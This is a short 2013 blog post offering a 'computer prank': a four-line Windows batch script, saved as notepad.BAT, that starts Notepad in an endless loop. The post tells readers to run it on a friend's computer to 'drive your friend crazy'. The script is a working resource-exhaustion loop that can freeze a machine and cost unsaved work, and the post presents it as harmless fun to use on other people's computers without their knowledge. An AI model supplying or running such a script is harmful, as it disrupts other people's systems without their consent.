Notepad Trick : Open More Notepad Continuously

By Unknown Tuesday, May 7, 2013 0 comments
Notepad Trick

This simple computer prank consists of a code below that will drive your friend crazy as it opens notepad continuously.


Open Notepad continually in your friend's computer:

Enter the code in the Notepad as:

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

 
Now Save it as "notepad.BAT" and double click it and enjoy the magic
Sharing is sexy

Related posts

0 comments for this post

Leave a reply